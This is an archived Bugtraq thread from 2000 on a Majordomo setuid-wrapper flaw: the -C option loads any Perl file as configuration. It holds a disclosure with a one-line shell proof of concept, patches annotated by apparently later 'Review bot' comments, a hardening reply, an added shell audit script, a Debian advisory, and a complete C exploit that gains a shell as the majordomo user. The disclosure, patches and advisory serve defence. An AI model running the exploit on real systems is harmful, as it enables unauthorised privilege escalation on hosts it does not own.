5140231 2000-05-28  20:27  /276 lines/ Postmaster
Recipient: Bugtraq (import) <11035>
Subject: more majordomo brokeness
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID:  <392AE52C.8512B2CB@core-sdi.com>
Date:         Tue, 23 May 2000 18:48:25 -0300
Reply-To: "Federico G. Schwindt" <core.lists.bugtraq@CORE-SDI.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Federico G. Schwindt" <core.lists.bugtraq@CORE-SDI.COM>
Organization: Core SDI S.A.
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

  Majordomo is a perl script for managing mailing lists. The package
comes with several scripts and a program written in C (wrapper) that
runs setuid to ensure that majordomo performs all the work with proper
permissions (for further information you can check the FAQ that comes
with the package under Doc/ or in
http://www.visi.com/~barr/majordomo-faq.html).
  This wrapper is installed by default as root, mode 4755 and group as
the one used for majordomo. What does this mean? If you can fool majordomo
into running arbitrary commands, they'll be run with uid and gid equal to the
one used for majordomo.
  Almost all of these scripts accept an optional configuration from the
command line, which is loaded and evaluated via perl's require keyword.
  This file is nothing but perl code, so creating a special file
with our commands and pointing to it as the configuration of any of the
affected scripts will result in the following (this applies to majordomo
1.94.5):

$ cat /tmp/myconf
system("/bin/sh");
$ id
uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
$ ./wrapper bounce-remind -C /tmp/myconf
$ id
uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)

  This is not new. The same problem has been seen in the past in the
majordomo script shipped with the previous version, 1.94.4 (for more
details, http://www.securityfocus.com/bid/903).
  Interestingly enough, this occurs in several scripts: archive2.pl,
bounce-remind, config-test, digest, majordomo, request-answer and
resend; medit under bin/, and archive_mh.pl, new-list, and sequencer
under Tools/ use 'require' in the same way, but since the wrapper only
executes those scripts found in the majordomo installation directory,
they cannot be exploited.
  The obvious fix is to remove this option from all the involved
scripts, but since it can be useful on large sites with several mailing
lists, we've chosen instead to only allow configuration files from a
trusted directory, removing the problem without losing functionality.
  Diffs:

--- majordomo-1.94.5/Makefile.orig	Tue Jan 18 11:01:17 2000
+++ majordomo-1.94.5/Makefile	Tue May 23 07:05:24 2000
@@ -63,7 +63,8 @@
 # passed to processes run by "wrapper"
 W_SHELL = /bin/sh
 W_PATH = /bin:/usr/bin:/usr/ucb
-W_MAJORDOMO_CF = $(W_HOME)/majordomo.cf
+W_MAJORDOMO_CF = majordomo.cf
+W_MAJORDOMO_CFDIR = $(W_HOME)/config

 # A directory for temp files..
 TMPDIR = /usr/tmp
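Review bot: `W_MAJORDOMO_CF` changes meaning here, from an absolute path to a bare file name that the next hunk joins under `W_MAJORDOMO_CFDIR`; a site that had pointed `W_MAJORDOMO_CF` at a file outside `$(W_HOME)` will silently end up with `$(W_HOME)/config/<that path>` after applying this. A comment above the variable stating that it is now a name relative to `W_MAJORDOMO_CFDIR` would avoid a broken install.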
@@ -77,7 +78,8 @@

 WRAPPER_FLAGS = -DBIN=\"$(W_HOME)\" -DPATH=\"PATH=$(W_PATH)\" \
 	-DHOME=\"HOME=$(W_HOME)\" -DSHELL=\"SHELL=$(W_SHELL)\" \
-	-DMAJORDOMO_CF=\"MAJORDOMO_CF=$(W_MAJORDOMO_CF)\"      \
+	-DMAJORDOMO_CF=\"MAJORDOMO_CF=$(W_MAJORDOMO_CFDIR)/$(W_MAJORDOMO_CF)\"
\
+	-DMAJORDOMO_CFDIR=\"MAJORDOMO_CFDIR=$(W_MAJORDOMO_CFDIR)\"      \
 	$(POSIX)

 INSTALL = ./install.sh
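Review bot: the `-DMAJORDOMO_CF=...` line and its trailing `\` have been split across two lines in transit, so the hunk will not apply as shown and make would see a dangling continuation; rejoin the backslash onto the end of the `-DMAJORDOMO_CF` line before patching.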
--- majordomo-1.94.5/archive2.pl.orig	Fri Jan  7 08:00:49 2000
+++ majordomo-1.94.5/archive2.pl	Tue May 23 07:47:09 2000
@@ -50,7 +50,7 @@
 # Read and execute the .cf file
 $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
 if ($ARGV[0] eq "-C") {
-    $cf = $ARGV[1];
+    $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
     shift(@ARGV);
     shift(@ARGV);
 }
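Review bot: when `$ARGV[1]` contains a `/` the `unless` leaves `$cf` at the earlier default (`$ENV{"MAJORDOMO_CF"}` or `/etc/majordomo.cf`), so a rejected `-C` argument is silently ignored and the script carries on against a different configuration; a `die` (or the script's abort routine) on a slash would make the rejection visible and stop the run. The same comment applies to the identical hunks for medit, new-list, request-answer and sequencer below.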
--- majordomo-1.94.5/contrib/archive_mh.pl.orig	Mon Mar 10 12:40:41 1997
+++ majordomo-1.94.5/contrib/archive_mh.pl	Tue May 23 07:50:23 2000
@@ -17,9 +17,9 @@
 $ENV{'PATH'} = "/bin:/usr/bin:/usr/ucb";

 # Read and execute the .cf file
-$cf = $ENV{"MAJORDOMO_CF"} || "/tools/majordomo-1.56/majordomo.cf";
+$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
 if ($ARGV[0] eq "-C") {
-    $cf = $ARGV[1];
+    $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
     shift(@ARGV);
     shift(@ARGV);
 }
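Review bot: the change of the default from `/tools/majordomo-1.56/majordomo.cf` to `/etc/majordomo.cf` is unrelated to the `-C` confinement and should be called out in the description; as the post itself notes, this contrib/ script is not reachable through the wrapper, so this hunk is general hardening rather than part of the fix.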
--- majordomo-1.94.5/bounce-remind.orig	Mon Dec  9 13:49:46 1996
+++ majordomo-1.94.5/bounce-remind	Tue May 23 07:47:27 2000
@@ -20,7 +20,7 @@
 # Read and execute the .cf file
 $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
 if ($ARGV[0] eq "-C") {
-    $cf = $ARGV[1];
+    $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]";
     shift(@ARGV);
     shift(@ARGV);
 }
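Review bot: this hunk is missing the `unless $ARGV[1] =~ /\//` guard that every other script receives, so here the `-C` argument is concatenated onto `$ENV{'MAJORDOMO_CFDIR'}` without any check and is not actually confined to the trusted directory; add the same guard as in the archive2.pl hunk (ideally aborting with an error rather than falling back).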
--- majordomo-1.94.5/config-test.orig	Wed Aug 27 12:17:13 1997
+++ majordomo-1.94.5/config-test	Tue May 23 16:10:05 2000
@@ -117,6 +117,8 @@
 print "\n\tNon obvious things that cause headaches:\n\n";
 &header('');

+$ARGV[0] = ($ARGV[0] && $ARGV[0] !~ /\//) ?
+    "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[0]" : '';
 $cf = $ARGV[0] || $ENV{'MAJORDOMO_CF'};

 if (eval "require '$cf'") {
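Review bot: after the two new lines `$cf` is still interpolated into a string eval at `if (eval "require '$cf'")`, so the slash check alone does not make the argument safe to evaluate as Perl source; switch to a block eval on the plain value, `eval { require $cf }`, so the name is only ever treated as a file path. Also, a rejected argument becomes `''` and falls through to `$ENV{'MAJORDOMO_CF'}` with no message.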
--- majordomo-1.94.5/digest.orig	Fri Jan  7 08:04:34 2000
+++ majordomo-1.94.5/digest	Tue May 23 16:02:49 2000
@@ -322,6 +322,8 @@
 		&abort("-C used without -l");
 	    } else {
 		# Read and execute the .cf file
+		$opt_c = ($opt_c && $opt_c !~ /\//) ?
+		    "$ENV{'MAJORDOMO_CFDIR'}/$opt_c" : '';
 		$cf = $opt_c || $ENV{"MAJORDOMO_CF"} ||
 		    "/etc/majordomo.cf";
 		require "$cf";
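Review bot: `&abort` is already in scope here (`&abort("-C used without -l")`), so a `-C` value containing `/` should call it rather than being replaced by `''` and silently falling back to `$ENV{"MAJORDOMO_CF"}` or `/etc/majordomo.cf`.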
--- majordomo-1.94.5/majordomo.orig	Thu Jan 13 14:29:31 2000
+++ majordomo-1.94.5/majordomo	Tue May 23 07:48:42 2000
@@ -29,7 +29,7 @@

 while ($ARGV[0]) {	# parse for config file or default list
     if ($ARGV[0] =~ /^-C$/i) {	# sendmail v8 clobbers case
-        $cf = $ARGV[1];
+        $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~
/\//;
         shift(@ARGV);
         shift(@ARGV);
     } elsif ($ARGV[0] eq "-l") {
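Review bot: the `unless $ARGV[1] =~ /\//;` clause has been wrapped in transit (the `/\//;` landed on its own line), so this hunk will not apply as shown; rejoin it before patching. Since the surrounding `if` matches `-C` case-insensitively for sendmail's benefit, the guard covers `-c` as well, which is correct.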
--- majordomo-1.94.5/medit.orig	Mon Apr 28 15:38:05 1997
+++ majordomo-1.94.5/medit	Tue May 23 07:48:55 2000
@@ -19,7 +19,7 @@
 # Read and execute the .cf file
 $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
 if ($ARGV[0] eq "-C") {
-    $cf = $ARGV[1];
+    $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
     shift(@ARGV);
     shift(@ARGV);
 }
--- majordomo-1.94.5/contrib/new-list.orig	Mon Dec  9 13:50:45 1996
+++ majordomo-1.94.5/contrib/new-list	Tue May 23 07:50:41 2000
@@ -15,7 +15,7 @@
 # Read and execute the .cf file
 $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
 if ($ARGV[0] eq "-C") {
-    $cf = $ARGV[1];
+    $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
     shift(@ARGV);
     shift(@ARGV);
 }
--- majordomo-1.94.5/request-answer.orig	Fri Jan  7 08:10:18 2000
+++ majordomo-1.94.5/request-answer	Tue May 23 07:49:10 2000
@@ -16,7 +16,7 @@
 # Read and execute the .cf file
 $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
 if ($ARGV[0] eq "-C") {
-    $cf = $ARGV[1];
+    $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
     shift(@ARGV);
     shift(@ARGV);
 }
--- majordomo-1.94.5/resend.orig	Fri Jan  7 12:32:39 2000
+++ majordomo-1.94.5/resend	Tue May 23 16:02:37 2000
@@ -79,6 +79,9 @@
 }

 # Read and execute the .cf file
+$cfdir = $ENV{"MAJORDOMO_CFDIR"};
+$opt_C = ($opt_C && $opt_C !~ /\//) ? "$cfdir/$opt_C" : '';
+$opt_c = ($opt_c && $opt_c !~ /\//) ? "$cfdir/$opt_c" : '';
 $cf = $opt_C || $opt_c || $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

 # Despite not having a place to send the remains of the body,
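Review bot: both `$opt_C` and `$opt_c` are rewritten before the `||` chain, so a `-C` value containing `/` becomes `''` and the script silently continues with `-c`, the environment or `/etc/majordomo.cf` instead of stopping; as with the other scripts, an explicit abort on a rejected value is preferable. `$cfdir` is also left empty when `MAJORDOMO_CFDIR` is unset (the wrapper exports it, but resend can be run by hand), which yields a path rooted at `/`; a one-line check that it is set would be cheap.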
--- majordomo-1.94.5/contrib/sequencer.orig	Mon Dec  9 13:50:48 1996
+++ majordomo-1.94.5/contrib/sequencer	Tue May 23 07:50:58 2000
@@ -48,7 +48,7 @@
 # Read and execute the .cf file
 $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
 if ($ARGV[0] eq "-C") {
-    $cf = $ARGV[1];
+    $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
     shift(@ARGV);
     shift(@ARGV);
 }
--- majordomo-1.94.5/wrapper.c.orig	Wed Aug 27 12:01:12 1997
+++ majordomo-1.94.5/wrapper.c	Tue May 23 07:06:23 2000
@@ -42,20 +42,27 @@
 #  define SHELL "SHELL=/bin/sh"
 #endif

+#ifndef MAJORDOMO_CF
+#  error "MAJORDOMO_CF not defined; edit Makefile"
+#endif
+
+#ifndef MAJORDOMO_CFDIR
+#  error "MAJORDOMO_CFDIR not defined; edit Makefile"
+#endif
+
 char * new_env[] = {
     HOME,		/* 0 */
     PATH,		/* 1 */
     SHELL,		/* 2 */
-#ifdef MAJORDOMO_CF
     MAJORDOMO_CF,	/* 3 */
-#endif
+    MAJORDOMO_CFDIR,	/* 4 */
     0,		/* possibly for USER or LOGNAME */
     0,		/* possible for LOGNAME */
     0,          /* possibly for timezone */
     0
 };

-int new_env_size = 7;				/* to prevent overflow problems */
+int new_env_size = 8;				/* to prevent overflow problems */

 main(argc, argv, env)
     int argc;
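Review bot: `new_env[]` now has nine entries (indices 0 through 8) while `new_env_size` is 8, and the later loop tests `e <= new_env_size`, so the constant is being used as the last valid index rather than the element count; the comment `/* to prevent overflow problems */` should say so, or better, derive it as `sizeof(new_env) / sizeof(new_env[0]) - 1` so that the next added variable cannot get the two out of step.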
@@ -89,11 +96,7 @@
      *  if they exist.
      */

-#ifdef MAJORDOMO_CF
-    e = 4; /* the first unused slot in new_env[] */
-#else
-    e = 3; /* the first unused slot in new_env[] */
-#endif
+    e = 5; /* the first unused slot in new_env[] */

     for (i = 0 ; env[i] != NULL && e <= new_env_size; i++) {
 	if ((strncmp(env[i], "USER=", 5) == 0) ||
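Review bot: `e = 5` is a second hard-coded copy of the slot layout in `new_env[]`; if the literal stays, the `/* 4 */` comment in the array and this constant must always move together, so a single `#define` used in both places (or counting the non-NULL leading entries at runtime) would keep them from drifting apart.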
@@ -153,5 +156,6 @@
     fprintf(stderr, "    PATH is %s,\n", PATH);
     fprintf(stderr, "    SHELL is %s,\n", SHELL);
     fprintf(stderr, "    MAJORDOMO_CF is %s\n", MAJORDOMO_CF);
+    fprintf(stderr, "    MAJORDOMO_CFDIR is %s\n", MAJORDOMO_CFDIR);
     exit(EX_OSERR);
 }

  MAJORDOMO_CFDIR points to the trusted directory. You should store all
the configuration files there. Be sure that it is pointing to the correct
place or majordomo won't work.
  We've also modified wrapper.c to barf if neither MAJORDOMO_CF nor
MAJORDOMO_CFDIR is defined, since there is no point in using it
otherwise, plus a few other minor paranoia changes... ;)
  Salute,

  f.-

--
Federico Schwindt - Developer				fgsch@core-sdi.com
Core SDI S.A.						http://www.core-sdi.com

--- For a personal reply use fgsch@core-sdi.com
(5140231) -----------------------------------

5151983 2000-06-01  07:51  /305 lines/ Postmaster
Recipient: Bugtraq (import) <11070>
Subject: Re: more majordomo brokeness
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-ID:  <71D105274EA7D011905700805FFECA5906B8EF9D@xch-sea-10.ca.boeing.com>
Date:         Tue, 30 May 2000 07:49:52 -0700
Reply-To: "Skahan, Vince" <Vince.Skahan@PSS.BOEING.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Skahan, Vince" <Vince.Skahan@PSS.BOEING.COM>
X-To:         BUGTRAQ@SECURITYFOCUS.COM, "Federico G. Schwindt" 
             <core.lists.bugtraq@CORE-SDI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

This came up in January. It's also well documented in the majordomo
FAQ: http://www.greatcircle.com/majordomo/majordomo-faq.html#wrapsec

It is easily possible to remove 'all' interactive access to all the
pieces of the majordomo software, even if you are using smrsh,
without modifying the majordomo software itself.

	*	set the group id in majordomo's makefile to group 'mail'
		(assuming you're the same as RedHat and mail is delivered
		as mail.mail on your o/s - check it with a script that runs 'id')
	*	remove world r-x on majordomo's home dir and its contents
	*	remove world r-x on the list dir and its contents
	*	still have the symbolic link to wrapper for smrsh to work if you
		have that installed with your sendmail

Tested with majordomo 1.94-5 on RH-6.1 (sendmail 8.9.3+smrsh)

--
-------- Vince.Skahan@boeing.com ------ http://bcstec.ca.boeing.com/~vds/ -------------
                 Boeing Shared Services Group - Technical Services
                    outside Boeing - http://www.halcyon.com/vince


> ----------
> From: 	Federico G. Schwindt[SMTP:core.lists.bugtraq@CORE-SDI.COM]
> Reply To: 	Federico G. Schwindt
> Sent: 	Tuesday, May 23, 2000 2:48 PM
> To: 	BUGTRAQ@SECURITYFOCUS.COM
> Subject: 	more majordomo brokeness
>
(5151983) ------------------------------------------(Rewrapped)
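As an added example (not code from either post, nor from the Majordomo package), here is a small POSIX-shell audit helper an administrator could run to check the three things this thread raises: whether the setuid wrapper is runnable by everyone, whether the home and list directories still carry world r-x (the hardening Vince describes), and whether the wrapper-reachable scripts named in Federico's post still hand the raw -C argument to require or have been confined to MAJORDOMO_CFDIR. The layout (wrapper and scripts directly in the majordomo home, lists under lists/ unless given) is an assumption.

```shell
#!/bin/sh
# Audit helper for a Majordomo 1.94.x install (added example, not from the
# posts above). Assumed layout: HOME_DIR/wrapper and the scripts beside it,
# lists under HOME_DIR/lists unless a second argument is given.

# Wrapper-reachable scripts that accept -C, as listed in the first post.
MJ_SCRIPTS="archive2.pl bounce-remind config-test digest majordomo request-answer resend"

# perm_string PATH -> the ten-character mode column of ls -ld, e.g. -rwsr-xr-x
perm_string() {
    ls -ld "$1" | cut -c1-10
}

# world_rx PATH -> true when "other" has read or execute/search permission
world_rx() {
    case "$(perm_string "$1" | cut -c8-10)" in
        *[rx]*) return 0 ;;
    esac
    return 1
}

# is_setuid PATH -> true when the setuid bit is set (s or S in the owner execute slot)
is_setuid() {
    case "$(perm_string "$1" | cut -c4)" in
        [sS]) return 0 ;;
    esac
    return 1
}

# cf_handling SCRIPT -> "patched" if the script confines -C to MAJORDOMO_CFDIR,
# "unpatched" if it still assigns the raw -C argument to $cf, else "none".
cf_handling() {
    if grep -q 'MAJORDOMO_CFDIR' "$1"; then
        echo patched
    elif grep -Eq '\$cf[[:space:]]*=[[:space:]]*\$(ARGV\[[01]\]|opt_[Cc])' "$1"; then
        echo unpatched
    else
        echo none
    fi
}

# majordomo_audit HOME_DIR [LIST_DIR]
# Prints one FINDING line per problem and returns the number of findings.
majordomo_audit() {
    mj_home=$1
    mj_lists=${2:-$1/lists}
    findings=0

    if [ -f "$mj_home/wrapper" ]; then
        set -- $(ls -ld "$mj_home/wrapper")
        echo "info: wrapper is $1 owner=$3 group=$4 (reply suggests group mail, no world r-x)"
        if is_setuid "$mj_home/wrapper" && world_rx "$mj_home/wrapper"; then
            echo "FINDING: $mj_home/wrapper is setuid and executable by everyone"
            findings=$((findings + 1))
        fi
    fi

    for d in "$mj_home" "$mj_lists"; do
        if [ -d "$d" ] && world_rx "$d"; then
            echo "FINDING: $d is world r-x ($(perm_string "$d"))"
            findings=$((findings + 1))
        fi
    done

    for s in $MJ_SCRIPTS; do
        [ -f "$mj_home/$s" ] || continue
        if [ "$(cf_handling "$mj_home/$s")" = unpatched ]; then
            echo "FINDING: $mj_home/$s passes the -C argument straight to require (unpatched)"
            findings=$((findings + 1))
        fi
    done

    return $findings
}
```

Run it as `majordomo_audit /usr/lib/majordomo` (or wherever W_HOME points); a non-zero exit status is the number of findings, so it drops straight into a cron job.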

5154044 2000-06-02  03:24  /171 lines/ Postmaster
Recipient: Bugtraq (import) <11110>
Subject: more majordomo brokeness - "exploit"
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: multipart/mixed 
             boundary="----=_NextPart_000_001D_01BFCBC9.D3DB68A0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4132.2800
Importance: Normal
Message-ID:  <LPBBINOIAGJKJFMHHGGMOECNCBAA.morpheusbd@gmx.net>
Date:         Thu, 1 Jun 2000 13:03:49 +0200
Reply-To: Morpheus <morpheusbd@GMX.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Morpheus <morpheusbd@GMX.NET>
X-To:         Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Just a quick 'n dirty "exploit" for the Majordomo-prob.
Probably useful to Admins who want to check (automatically)
their system with one small script ...
It's possible to adapt this program easily - if you need to.

Unfortunately I have no time to write an English version
but I think the language is unimportant for the exploitation ...

regards,
Morpheus
[Attachment: MAJOR2.C]
/*
		MAJORDOMO - EXPLOIT FOR LINUX
		    tested up to v1.94.5
		  programmed by Morpheus

    The exploit is based on the faulty use of Majordomo scripts. By
    default the exploit uses the "bounce-remind" script. On success the
    exploit delivers a shell with uid and gid set according to the
    Majordomo wrapper.
    The exploit was tested on SuSE Linux 6.0 / 6.3 (CeBIT version).

    To compile the exploit:

    	gcc major.c -o major

    To use the exploit:

    If the exploit is called <major>, simply enter ./major. That should
    be enough. If no shell is started, check the error messages. Either
    the Majordomo version is not "compatible" or the Majordomo script is
    not present. Then either enter ./major auto, so that the exploit
    tries all vulnerable scripts, or enter ./major <script>, where
    <script> is to be replaced by a vulnerable Majordomo script. To get
    the help overview, simply enter ./major -h.

    Programmed by Morpheus [BrightDarkness] '00
    URL:  www.brightdarkness.de
    Mail: morpheusbd@gmx.net

    This bug in Majordomo was not discovered by me. I only programmed
    the corresponding exploit for this bug.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcmp, strncpy, strlen (missing in the posted copy) */
#include <unistd.h>   /* write, close, execl (missing in the posted copy) */
#include <fcntl.h>

#define MAJORDOMO	"/usr/lib/majordomo/wrapper"
#define SHELL 		"system(\"/bin/sh\")"
#define MORPHEUS	"/tmp/morpheus"
#define WRAPPER		"wrapper"

void intro(void);
void usage(char *arg);

int main(int argc, char **argv)
  {
    char skript[30];
    char *skripte[40];
    int i = 0;
    int file;

    /* the wrapper-reachable scripts that accept -C */
    skripte[1] = "bounce-remind";
    skripte[2] = "archive2.pl";
    skripte[3] = "config-test";
    skripte[4] = "digest";
    skripte[5] = "majordomo";
    skripte[6] = "request-answer";
    skripte[7] = "resend";

    if ((argc == 2) && (strcmp(argv[1], "-h") == 0))
      usage(argv[0]);

    if (argc == 2)
      {
        /* the posted copy bounded strncpy() by strlen() of the
           uninitialised buffer; bound it by the buffer size instead */
        strncpy(skript, argv[1], sizeof(skript) - 1);
        skript[sizeof(skript) - 1] = '\0';
      }
    else
      strcpy(skript, "bounce-remind");

    /* the "configuration" file: one line of perl that gets require'd */
    if ((file = open(MORPHEUS, O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0)
      {
        perror(MORPHEUS);
        exit(1);
      }
    write(file, SHELL, strlen(SHELL));
    close(file);

    intro();
    if (strcmp(skript, "auto") == 0)   /* posted copy called strncmp() with two arguments */
      {
        /* execl() only returns on failure, so the loop only reaches the
           next script when the wrapper itself could not be started */
        for (i = 1; i <= 7; i++)
          {
            printf("using : %s\n", skripte[i]);
            if (execl(MAJORDOMO, WRAPPER, skripte[i], "-C", MORPHEUS, (char *)0) == -1)
              perror("EXECL");
          }
      }
    else
      {
        printf("using : %s\n", skript);
        if (execl(MAJORDOMO, WRAPPER, skript, "-C", MORPHEUS, (char *)0) == -1)
          perror("EXECL");
      }
    return 0;
  }

void intro(void)
  {
    printf("\033[2J\033[1;1H");
    printf("\033[1;33mExploit-Code für Majordomo Wrapper <= v1.94.5\n");
    printf("\033[1;32mProgrammiert von Morpheus [BrightDarkness] '00\n");
    printf("\033[1;31mURL:  \033[1;32mwww.brightdarkness.de\n");
    printf("\033[1;31mmail: \033[1;32mmorpheusbd@gmx.net\n");
    printf("\033[0;29m");
  }

void usage(char *arg)
  {
    intro();
    printf("\033[1;34m");
    printf("Hilfe für dieses Programm :\n");
    printf("Benutzung : %s -h           Help screen\n", arg);
    printf("            %s auto         Trying all scripts automatically\n", arg);
    printf("            %s <skriptname> Tries just this <script>\n", arg);
    printf("\033[0;29m");
    exit(0);
  }
(5154044) ------------------------------------------(Rewrapped)

5158336 2000-06-04  04:18  /59 lines/ Postmaster
Recipient: Bugtraq (import) <11140>
Subject: [Debian] Majordomo will be removed
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000603150754.G22383@underground.org>
Date:         Sat, 3 Jun 2000 15:07:54 -0700
Reply-To: Aleph One <aleph1@UNDERGROUND.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM

------------------------------------------------------------------------
Debian Security Advisory                             security@debian.org
http://www.debian.org/security/                         Wichert Akkerman
June  3, 2000
------------------------------------------------------------------------


Package        : majordomo
Problem type   : local exploit
Debian-specific: no

The majordomo package as shipped in the non-free section accompanying
Debian GNU/Linux 2.1/slink allows any local user to trick majordomo
into executing arbitrary code or to create or write files as the
majordomo user anywhere on the filesystem.

This is a documented issue and the advised workaround is to either
have no untrusted users on a system running majordomo or to use a
setuid wrapper that the MTA delivery agent can run, a suboptimal
solution.

We feel that those options are not a good solution, but unfortunately
the majordomo license does not allow us to fix these problems and
distribute a fixed version. As a result we have decided to remove
majordomo from our archives.

If you are using majordomo we recommend that you replace it with one
of the many other mailing-list tools available such as fml, mailman
or smartlist.

--
----------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable updates
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates
Mailing list: debian-security-announce@lists.debian.org

(5158336) ------------------------------------------(Rewrapped)